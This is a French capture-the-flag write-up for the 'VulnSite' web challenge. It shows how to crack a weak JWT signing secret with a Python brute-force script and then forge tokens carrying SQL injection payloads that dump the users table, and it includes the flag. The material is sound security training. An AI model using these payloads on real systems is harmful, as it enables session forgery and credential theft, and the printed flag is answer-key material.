# WRITEUP WEB / VULNSITE
## Consignes :

```
Trouver le mot de passe administrateur.
Réaliser un brute force sur le formulaire de connexion est inutile.


http://game1.marshack.fr:42082

> Format du flag : fl@g{..........}
```

## Pièce(s)  jointe(s) :

```
Néant
```

## Serveur :
```
game1
```

## Points attribués :

```
30
```

## Hint :

```

```

## Flag :

```
fl@g{SQL_1nj3ction_C4n_b3_Everywh3re}
```


# writeup

Le site web est composé de 3 pages :

- l’accueil (home),
- la page de connexion (login),
- la page d’inscription (register).

Connexion :

```
http://game1.marshack.fr:48002
```



![](img-writeup_web_vulnsite/image-01.png)

Cliquer sur **register** et créer le compte **Azerty8** 


![](img-writeup_web_vulnsite/image-02.png)


Cliquer sur **here**

![](img-writeup_web_vulnsite/image-03.png)

Se connecter avec le compte précédemment créé

![](img-writeup_web_vulnsite/image-04.png)


En créant un compte, on remarque qu’on nous indique notre id et notre pseudo sur la page
« Mon compte » :

![](img-writeup_web_vulnsite/image-05.png)

On remarque également que notre utilisateur possède un cookie avec une valeur « token »,
faisant penser à un *jwt* (*Java Web Token*) :

```
uid : 676bc5c2-a790-11ed-a911-02420ac90702

token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjY3NmJjNWMyLWE3OTAtMTFlZC1hOTExLTAyNDIwYWM5MDcwMiIsImV4cCI6MTY3NTg1MTAwMn0.uRKHmaaGTYxkHI_neR7mjpIXwwkEfJPZxfW-NwD7fJE
```

Affichage du cookie avec l'addon firefox Cookie Quick Manager:


![](img-writeup_web_vulnsite/image-06.png)

En regardant ce qu’il y a un l’intérieur du jwt, il contient les informations suivantes :

- le type : typ
- l’algorithme de chiffrement utilisé : alg
- l’id utilisateur : id
- la date d’expiration du jeton : exp

Il est possible de consulter le contenu d'un jeton jwt en ligne, par exemple sur jwt.io :


![](img-writeup_web_vulnsite/image-08.png)



L’algorithme utilisé pour la signature est du HS256 (HmacSha256) HS256 utilise un secret (passphrase) pour vérifier et signer chaque message. Un développeur peu sensibilisé pourrait utiliser un secret faible pour signer les jetons jwt.

Sachant cela, nous tentons alors un brute force avec la wordlist rockyou sur la signature du jeton (la partie bleue), pour tenter de retrouver le secret. Cette étape peut se faire à l’aide d’outils disponibles en ligne (par exemple : jwt-cracker, jwt-secret) ou encore à l’aide d’un petit script python écrit avec la librairie pyjwt :

```
python3 brute_force_jwt.py -w rockyou.txt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjY3NmJjNWMyLWE3OTAtMTFlZC1hOTExLTAyNDIwYWM5MDcwMiIsImV4cCI6MTY3NTg1MTAwMn0.uRKHmaaGTYxkHI_neR7mjpIXwwkEfJPZxfW-NwD7fJE

```
```

Fichier: brute_force_jwt.py

Prerequis: installer le module:  pyjwt

```python
import jwt
import argparse
import base64
import sys
parser = argparse.ArgumentParser()
parser.add_argument('Jwt', help='Jwt to bruteforce')
parser.add_argument('-w', '--wordlist', help='Wordlist to use.')

args = parser.parse_args()

print("Jwt informations")
token = args.Jwt.split(".")
print (token)


print("[+] Signature: " + base64.b64decode(token[0]).decode())
print("[+] Datas: " + base64.b64decode(token[1]+ "==").decode())

wordlist = open(args.wordlist, encoding="latin-1").read().splitlines()


print("[-] Brute force...")

i = 0
found=0
for pwd in wordlist:
    i = i+1
    try:
        jwt.decode(args.Jwt, pwd, algorithms=["HS256"],options={"verify_exp": False})
        print("[-] {} secrets tested.".format(i))
        print("\n[+] Secret found: " + pwd)
        found=1
    except jwt.exceptions.InvalidSignatureError:
        continue

if (found==0):    
    print("[-] {} secrets tested.".format(i))
    print("[-] Secret not found.")


```

Une fois l’outil choisi, on lance le brute force sur le jwt :

```
./brute_force_jwt.py -w rockyou.txt  eyJh ... ... i0OOg

Parametre :
	-w rockyou.txt : dictionnaire
	token : eyJh ... ... i0OOg

```

```
Jwt informations
['eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9', 'eyJpZCI6IjY3NmJjNWMyLWE3OTAtMTFlZC1hOTExLTAyNDIwYWM5MDcwMiIsImV4cCI6MTY3NTg1MTAwMn0', 'uRKHmaaGTYxkHI_neR7mjpIXwwkEfJPZxfW-NwD7fJE']
[+] Signature: {"alg":"HS256","typ":"JWT"}
[+] Datas: {"id":"676bc5c2-a790-11ed-a911-02420ac90702","exp":1675851002}
[-] Brute force...
[-] 4 secrets tested.

[+] Secret found: sotired1

```
Le secret trouvé est : sotired1
Il est possible maintenant de créer nos propres jetons jwt.

Comme nous l’avons constaté plus tôt, le jwt contient notre id utilisateur (id) et la page " Mon compte " nous affiche également cet id. On peut se demander alors, si l’id qui est affiché sur la page " Mon compte " utilise les informations fournies par le jeton jwt.
On tente une injection SQL dans le champ id du jeton en commençant par ajouter un guillemet :



Dans la suite de ce tutorial nous utilisons l'encodeur/décodeur de jeton jwt disponible à cette adresse

```
https://jwt.io/
```

 Payload injecté dans le jwt :

```
{
"id": "676bc5c2-a790-11ed-a911-02420ac90702'","exp": 1654622869
}
```


![](img-writeup_web_vulnsite/image-08.png)



Pour injecter les tokens on peut utiliser

- La console développeur de firefox
- Un addon firefox  
- Burpsuite
- Ou ce script python proposé sur github : https://github.com/ticarpi/jwt_tool



L’ajout d’un guillemet déclenche une erreur serveur :

![](img-writeup_web_vulnsite/image-09.png)



On continue notre investigation en utilisant le célèbre ' or 1=1-- - :
Payload injecté dans le jwt :

```
{
"id": "676bc5c2-a790-11ed-a911-02420ac90702' or 1=1-- -", "exp": 1654622869
}
```

![](img-writeup_web_vulnsite/image-10.png)



Qui nous retourne tous les utilisateurs de la plateforme. On tente ensuite d'identifier le
nombre de colonnes pour forger nos commandes :
Payload injecté dans le jwt :

```
{
"id": "676bc5c2-a790-11ed-a911-02420ac90702' union SELECT 1,2,3-- -","exp": 1654622869
}
```

![](img-writeup_web_vulnsite/image-11.png)





Le nombre de colonnes est de 3, on identifie ensuite la technologie utilisée en backend :

Payload injecté dans le jwt :

```
{
"id": "676bc5c2-a790-11ed-a911-02420ac90702' union SELECT 1,sqlite_version(),3-- -","exp": 1654622869
}
```


![](img-writeup_web_vulnsite/image-12.png)




Il s'agit d'une base de données sqlite version 3.34.1. On tente de récupérer le nom des tables :

Payload injecté dans le jwt :

```
{
"id": "676bc5c2-a790-11ed-a911-02420ac90702' union SELECT tbl_name,tbl_name,3 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'-- -",
"exp": 1654622869
}
```


![](img-writeup_web_vulnsite/image-13.png)



Le nom de la table est "users". On récupère maintenant le nom des colonnes :

Payload injecté dans le jwt :

```
{
"id": "676bc5c2-a790-11ed-a911-02420ac90702' union SELECT 1,sql,3 FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='users'-- -", "exp": 1654622869
}
```
![](img-writeup_web_vulnsite/image-14.png)

```
CREATE TABLE users (id TEXT PRIMARY KEY, username TEXT,password TEXT,UNIQUE(id, username, password))
```

Le nom des 3 colonnes est id, username et password. Il ne nous reste plus qu'à forger la
bonne commande pour nous retourner la liste des utilisateurs et leurs mots de passe :
Payload injecté dans le jwt :

```
{
"id": "676bc5c2-a790-11ed-a911-02420ac90702' union SELECT username,password, 3 FROM users-- -", "exp": 1654622869
}
```

![](img-writeup_web_vulnsite/image-15.png)





On repère le pseudo de l'administrateur "admin" avec son mot de passe qui est le flag :
fl@g{SQL_1nj3ction_C4n_b3_Everywh3re}.

-----------------------------------------------

Annexe 1:

Pour tester le challenge, on a généré un token qui doit afficher le flag
```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjZhOTY3Y2U1LWIyY2EtMTFlYy05YWNmLWU1Yzk1MDM2YmE0YicgdW5pb24gU0VMRUNUIHVzZXJuYW1lLHBhc3N3b3JkLCAzIEZST00gdXNlcnMtLSAtIiwiZXhwIjoxNjgxOTU3OTA2fQ.snK9A88Gk7ODp8ZxBRNLvjRo92yOpf1J98v3zM0S3eE
```

On peut modifier le cookie et rejouer la requete http://game1.marshack.fr:42082/account  avec firefox. On peut également utiliser des addons firefox pour modifier le cookie (Cookie Quick Manager)

Attention : la date d'expiration du token est le 20/04/2023. celui-ci ne fonctionnera plus après cette date.


Annexe 2 :
script pouvant être utilisé pour résoudre ce challenge

```
https://github.com/ticarpi/jwt_tool
```


Annexe 3 :

Script python permettant de générer l'ensemble des tokens en fonction de ' id: 


```
#!/usr/bin/env python3


import jwt
import argparse
import base64
import sys

# encodage du jwt 

value_id="676bc5c2-a790-11ed-a911-02420ac90702"

print (value_id)

print ()
print ("'")
encoded_jwt = jwt.encode({"id":value_id+"'","exp":"1680000000"}, "sotired1", algorithm="HS256")
print (encoded_jwt)

print ()
print ("' or 1=1-- -")
encoded_jwt = jwt.encode({"id":value_id+"' or 1=1-- -","exp":"1680000000"}, "sotired1", algorithm="HS256")
print (encoded_jwt)



print ()
print ("' union SELECT 1,2,3-- -")
encoded_jwt = jwt.encode({"id":value_id+"' union SELECT 1,2,3-- -","exp":"1680000000"}, "sotired1", algorithm="HS256")
print (encoded_jwt)


print ()
print ("' union SELECT 1,sqlite_version(),3-- -")
encoded_jwt = jwt.encode({"id":value_id+"' union SELECT 1,sqlite_version(),3-- -","exp":"1680000000"}, "sotired1", algorithm="HS256")
print (encoded_jwt)



print ()
print ("' union SELECT tbl_name,tbl_name,3 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'-- -")
encoded_jwt = jwt.encode({"id":value_id+"' union SELECT tbl_name,tbl_name,3 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'-- -","exp":"1680000000"}, "sotired1", algorithm="HS256")
print (encoded_jwt)


print ()
print ("' union SELECT 1,sql,3 FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='users'-- -")
encoded_jwt = jwt.encode({"id":value_id+"' union SELECT 1,sql,3 FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='users'-- -","exp":"1680000000"}, "sotired1", algorithm="HS256")
print (encoded_jwt)


print ()
print ("' union SELECT username,password, 3 FROM users-- -")
encoded_jwt = jwt.encode({"id":value_id+"' union SELECT username,password, 3 FROM users-- -","exp":"1680000000"}, "sotired1", algorithm="HS256")
print (encoded_jwt)

```
<!-- Review Taz : 20230322 -->